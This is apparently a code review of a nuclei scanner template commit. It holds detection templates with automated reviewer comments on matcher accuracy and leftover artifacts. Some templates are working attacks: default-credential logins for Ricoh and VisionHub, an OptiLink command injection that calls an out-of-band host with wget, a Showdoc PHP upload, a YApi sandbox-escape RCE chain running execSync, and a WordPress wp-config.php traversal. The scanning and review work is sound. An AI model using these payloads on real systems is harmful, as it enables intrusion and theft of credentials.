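Review bot: `user=admin&passwd=admin&challengePwd=&ok=Login` is posted to a PHP endpoint without a `Content-Type: application/x-www-form-urlencoded` header; PHP only populates `$_POST` for form-encoded or multipart bodies, so unless nuclei injects that header the login is never attempted — add it under `headers:`. The `Set-Cookie: PHPSESSID` matcher adds little, since PHP typically issues a session cookie on the login page regardless of whether the credentials were accepted, while the `Warning: Your device is still configured with the default admin` banner is the real signal; with `matchers-condition: and`, a missing cookie would hide a true positive. Consider dropping the cookie matcher or documenting why it is required.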
|
|
@ -0,0 +1,28 @@
|
||||||
|
id: ricoh-weak-password
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Ricoh Weak Password
|
||||||
|
author: gy741
|
||||||
|
severity: high
|
||||||
|
tags: ricoh,default-login
|
||||||
|
reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Cookie: cookieOnOffChecker=on;
|
||||||
|
|
||||||
|
wimToken=&userid_work=&userid=YWRtaW4%3D&password_work=&password=&open=
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- 'wimsesid=[0-9]+'
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 302
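Review bot: `info` has no `description`, so a hit reports only "Ricoh Weak Password" without saying what was tried; the request shows a login as `admin` (`userid=YWRtaW4%3D` is base64 for `admin`) with an empty password, which should be written down, e.g. `description: Ricoh Web Image Monitor accepts the administrator account (admin) with an empty password.` The raw POST carries a form body without `Content-Type: application/x-www-form-urlencoded`. Whether Web Image Monitor also answers a failed login with a 302 and a `wimsesid` cookie is not shown here; if it does, the matcher pair fires on every Ricoh regardless of password, so this should be confirmed against a device with a password set.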
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: visionhub-default-credentials
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: VisionHub Default Credentials
|
||||||
|
author: Techryptic (@Tech)
|
||||||
|
severity: high
|
||||||
|
description: Default Credentials of admin:admin on VisionHub application.
|
||||||
|
tags: visionhub,default-login
|
||||||
|
reference: https://www.qognify.com/products/visionhub/
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/VisionHubWebApi/api/Login'
|
||||||
|
headers:
|
||||||
|
Authorization: Basic YWRtaW46YWRtaW4=
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Set-Cookie: admin"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
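Review bot: Success is inferred solely from a header containing `Set-Cookie: admin` plus a 200, which would also match any cookie whose name merely starts with `admin` and says nothing about the credentials being accepted; match the exact cookie (`Set-Cookie: admin=`) or the session token the API actually returns on success, and, if the endpoint returns JSON, add a body matcher on a field only present after authentication. The request also sends Basic credentials to a `Login` API with an empty POST body; the reference is the product page and does not document the API contract, so whether the endpoint reads `Authorization` rather than a JSON body should be confirmed on an instance.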
|
|
@ -2,7 +2,7 @@ id: heroku-takeover
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: heroku takeover detection
|
name: heroku takeover detection
|
||||||
author: pdteam
|
author: 0xPrial,pdteam
|
||||||
severity: high
|
severity: high
|
||||||
tags: takeover
|
tags: takeover
|
||||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||||
|
@ -15,7 +15,6 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "There's nothing here, yet."
|
|
||||||
- "herokucdn.com/error-pages/no-such-app.html"
|
- "herokucdn.com/error-pages/no-such-app.html"
|
||||||
- "<title>No such app</title>"
|
- "<title>No such app</title>"
|
||||||
condition: and
|
condition: and
|
|
@ -2,7 +2,7 @@ id: netlify-takeover
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: netlify takeover detection
|
name: netlify takeover detection
|
||||||
author: pdteam
|
author: 0xPrial,pdteam
|
||||||
severity: high
|
severity: high
|
||||||
tags: takeover
|
tags: takeover
|
||||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||||
|
@ -16,9 +16,9 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Not Found"
|
- "Not found - Request ID:"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "server: Netlify"
|
- "Netlify"
|
||||||
part: header
|
part: header
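Review bot: The header word was loosened from `server: Netlify` to just `Netlify`; the likely reason the old value never matched is header-name casing — nuclei's `header` part is the dumped response, in which the name is canonicalised to `Server:` — so `Server: Netlify` would restore a precise match without accepting any header that merely contains the vendor name. Keeping bare `Netlify` is tolerable only because the `Not found - Request ID:` body word is still required alongside it; the narrower form costs nothing.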
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: aem-detection
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Favicon based AEM Detection
|
||||||
|
severity: info
|
||||||
|
author: shifacyclewala,hackergautam
|
||||||
|
tags: aem,favicon,tech
|
||||||
|
reference: |
|
||||||
|
- https://twitter.com/brsn76945860/status/1171233054951501824
|
||||||
|
- https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a
|
||||||
|
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
|
||||||
|
- https://github.com/devanshbatham/FavFreak
|
||||||
|
- https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/libs/granite/core/content/login/favicon.ico"
|
||||||
|
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 2
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))"
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: node-red-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Node RED Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,apache
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>Node-RED</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
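Review bot: The `apache` tag is wrong for Node-RED, which is a Node.js application, so `-tags apache` runs would include this template and its findings would be filed under Apache; use `tags: tech,node-red`. Matching only `<title>Node-RED</title>` on `/` is fine for a detect template, though an instance mounted under a sub-path behind a reverse proxy would be missed — acceptable at `severity: info`.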
|
|
@ -0,0 +1,39 @@
|
||||||
|
id: sap-igs-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SAP Internet Graphics Server (IGS) Detection
|
||||||
|
author: _generic_human_
|
||||||
|
description: Detection of SAP Internet Graphics Server (IGS)
|
||||||
|
severity: info
|
||||||
|
tags: sap,tech,igs
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 2
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "SAP IGS"
|
||||||
|
- "is running"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "SAP Internet Graphics Server"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
part: header
|
||||||
|
kval:
|
||||||
|
- "Server"
|
|
@ -0,0 +1,21 @@
|
||||||
|
id: seeddms-detect
|
||||||
|
info:
|
||||||
|
name: Seeddms-
|
||||||
|
author: pussycat0x
|
||||||
|
severity: info
|
||||||
|
tags: tech
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
|
||||||
|
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 2
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>SeedDMS: Sign in</title>"
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
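Review bot: `name: Seeddms-` is a truncated placeholder and is what appears in every result line; it should be `name: SeedDMS Detect`, and `tags` should carry the product (`tags: tech,seeddms`) so the template can be selected like the other detection templates in this commit. `<title>SeedDMS: Sign in</title>` is also the only body signal; if SeedDMS localises the page title, non-English installs will be missed, so a second, locale-independent word with `condition: or` would be more tolerant. A blank line between `id:` and `info:` would match the file layout used elsewhere in the repository.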
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: yapi-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: YApi Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,yapi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/"
|
||||||
|
- "{{BaseURL}}:3000"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>YApi-高效、易用、功能强大的可视化接口管理平台</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
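Review bot: The second path, `{{BaseURL}}:3000`, is appended to the full base URL, so for a target given as `http://host:8080` or `http://host/app` it produces `http://host:8080:3000` or `http://host/app:3000`, neither of which is the intended origin. Build the port variant from scheme and host instead (`{{Scheme}}://{{Host}}:3000` where the nuclei version exposes those variables), or drop it and let users pass port 3000 explicitly. The title match itself is fine.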
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: optilink-ont1gew-gpon-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution
|
||||||
|
author: gy741
|
||||||
|
severity: critical
|
||||||
|
description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
|
||||||
|
reference: |
|
||||||
|
- https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
|
||||||
|
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
|
||||||
|
tags: optiLink,rce,oob
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /boaform/admin/formTracert HTTP/1.1
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Origin: http://{{Hostname}}
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer: http://{{Hostname}}/diag_ping_admin_en.asp
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User: e8c
|
||||||
|
Password: e8c
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||||
|
|
||||||
|
target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
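Review bot: The `name` claims `Pre-Auth Remote Code Execution` while the `description` says an authenticated attacker is required, and the request itself sends `User: e8c` and `Password: e8c` headers — the exploit as written depends on default credentials, not on a missing authentication check. Make the two agree, e.g. `name: OptiLink ONT1GEW GPON - Remote Code Execution (default credentials e8c:e8c)`, and mention the credential dependence in `description` so a hit is triaged correctly. The `optiLink` tag should be lower-case (`optilink`) like the other tags, and the body `target_addr="1.1.1.1+...`"&waninf=127.0.0.1"` ends with an unbalanced quote — harmless if copied from the PoC, but worth confirming it is intentional.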
|
|
@ -1,4 +1,5 @@
|
||||||
id: showdoc-file-upload-rce
|
id: showdoc-file-upload-rce
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Showdoc < 2.8.6 File Upload RCE
|
name: Showdoc < 2.8.6 File Upload RCE
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
|
@ -20,7 +21,7 @@ requests:
|
||||||
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
|
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
|
||||||
Content-Type: text/plain
|
Content-Type: text/plain
|
||||||
|
|
||||||
<?php phpinfo();?>
|
<?php echo md5('rce_test');?>
|
||||||
----------------------------835846770881083140190633--
|
----------------------------835846770881083140190633--
|
||||||
|
|
||||||
- |
|
- |
|
||||||
|
@ -37,11 +38,12 @@ requests:
|
||||||
regex:
|
regex:
|
||||||
- '/Uploads\\(.*?)"\,"success"'
|
- '/Uploads\\(.*?)"\,"success"'
|
||||||
|
|
||||||
req-condition: true
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: word
|
||||||
dsl:
|
words:
|
||||||
- 'contains(body_2, "PHP Extension")'
|
- '3c7cb9f46815a790686b857fdbc4295a'
|
||||||
- 'contains(body_2, "PHP Version")'
|
|
||||||
- 'status_code_2 == 200'
|
- type: status
|
||||||
condition: and
|
status:
|
||||||
|
- 200
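Review bot: Replacing `phpinfo()` with `echo md5('rce_test')` is an improvement — the proof no longer dumps server configuration into scan output and a fixed token is a tighter signal — but the constant `3c7cb9f46815a790686b857fdbc4295a` must actually equal `md5('rce_test')`; please verify it, since a wrong hash silently turns every real hit into a miss. The uploaded `test.<>php` still remains on the target after the scan (no deletion follows the upload), so `description` should say an artifact is left behind. The old `req-condition`/`status_code_2` form bound the check to the second response; with plain matchers each response is evaluated on its own, which still works here because only the second response can contain the hash.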
|
|
@ -0,0 +1,110 @@
|
||||||
|
id: yapi-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Yapi Remote Code Execution
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
tags: yapi,rce
|
||||||
|
reference: |
|
||||||
|
- https://www.secpulse.com/archives/162502.html
|
||||||
|
- https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
|
||||||
|
- https://twitter.com/sec715/status/1415484190561161216
|
||||||
|
- https://github.com/YMFE/yapi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- | # REQUEST 1
|
||||||
|
POST /api/user/reg HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Content-Length: 94
|
||||||
|
Content-Type: application/json;charset=UTF-8
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
{"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"}
|
||||||
|
|
||||||
|
- | # REQUEST 2
|
||||||
|
GET /api/group/list HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Content-Type: application/json, text/plain, */*
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
- | # REQUEST 3
|
||||||
|
POST /api/project/add HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Content-Length: 106
|
||||||
|
Content-Type: application/json;charset=UTF-8
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
{"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"}
|
||||||
|
|
||||||
|
- | # REQUEST 4
|
||||||
|
GET /api/project/get?id={{project_id}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
- | # REQUEST 5
|
||||||
|
POST /api/interface/add HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Content-Length: 89
|
||||||
|
Content-Type: application/json;charset=UTF-8
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
{"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}}
|
||||||
|
|
||||||
|
- | # REQUEST 6
|
||||||
|
POST /api/plugin/advmock/save HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Content-Length: 382
|
||||||
|
Content-Type: application/json;charset=UTF-8
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
{"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true}
|
||||||
|
|
||||||
|
- | # REQUEST 7
|
||||||
|
GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Accept-Encoding: gzip
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: group_id
|
||||||
|
group: 1
|
||||||
|
internal: true
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '"_id":([0-9]+),"group_name"'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: interface_id
|
||||||
|
group: 1
|
||||||
|
internal: true
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '"req_body_form":\[\],"_id":([0-9]+)'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: project_id
|
||||||
|
group: 1
|
||||||
|
internal: true
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '"tag":\[\],"_id":([0-9]+)'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0:"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
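Review bot: The chain leaves persistent artifacts on the target: a registered user (request 1), a project (3), an interface (5) and — most importantly — an advanced mock script (6) that runs `child_process.execSync("cat /etc/passwd")` for anyone who requests `/mock/{{project_id}}/{{randstr_1}}` after the scan has finished. No request removes any of it, so a finding is converted into a standing unauthenticated command-execution endpoint; add teardown requests (delete the interface and project, or at least re-save `mock_script` as an empty script with `"enable":false`) and state the residue in `description`. The hard-coded `Content-Length: 94/106/89/382` values cannot be right when the bodies contain `{{randstr}}` and extracted ids of varying length; the client recomputes them for non-`unsafe` raw requests, but they are misleading and should be dropped. `info` also lacks a `description`; a sentence explaining the open-registration → project → mock-script path would help readers who cannot use the Chinese-language reference.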
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: wp-memphis-documents-library-lfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin Memphis Document Library 3.1.5 LFI
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
tags: wordpress,wp-plugin,lfi
|
||||||
|
description: Arbitrary file download in Memphis Document Library 3.1.5
|
||||||
|
reference: |
|
||||||
|
- https://www.exploit-db.com/exploits/39593
|
||||||
|
- https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php'
|
||||||
|
- '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "DB_NAME"
|
||||||
|
- "DB_PASSWORD"
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
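Review bot: Both paths use a fixed `../../../wp-config.php` depth, which assumes the handler resolves relative to `wp-content/plugins/<plugin>/`; if the plugin resolves from a deeper or shallower directory the probe misses, so confirm the depth against the exploit-db entry and consider adding a second depth such as `../../../../wp-config.php`. A hit captures the live database credentials (`DB_PASSWORD`) in the response, so anyone storing nuclei output with request/response bodies should treat those results as secrets — worth a line in `description`. The `name` says `LFI` while `description` says `Arbitrary file download`; pick one term.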
|
|
@ -7,4 +7,6 @@ info:
|
||||||
tags: workflow
|
tags: workflow
|
||||||
|
|
||||||
workflows:
|
workflows:
|
||||||
- template: misconfiguration/aem/
|
- template: technologies/aem-detection.yaml
|
||||||
|
subtemplates:
|
||||||
|
- tags: aem
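Review bot: Gating every `aem`-tagged template on `technologies/aem-detection.yaml` makes the workflow depend on a single favicon hash: an AEM instance with a custom favicon, a blocked `/libs/granite/core/content/login/favicon.ico`, or a front end that answers 200 with a different body will match nothing and the whole AEM check set is silently skipped, whereas the previous `misconfiguration/aem/` entry ran those templates unconditionally. Pair the favicon detector with a second, weaker AEM indicator as an alternative trigger, or document in the workflow `info` that detection is favicon-based and can be defeated by branding.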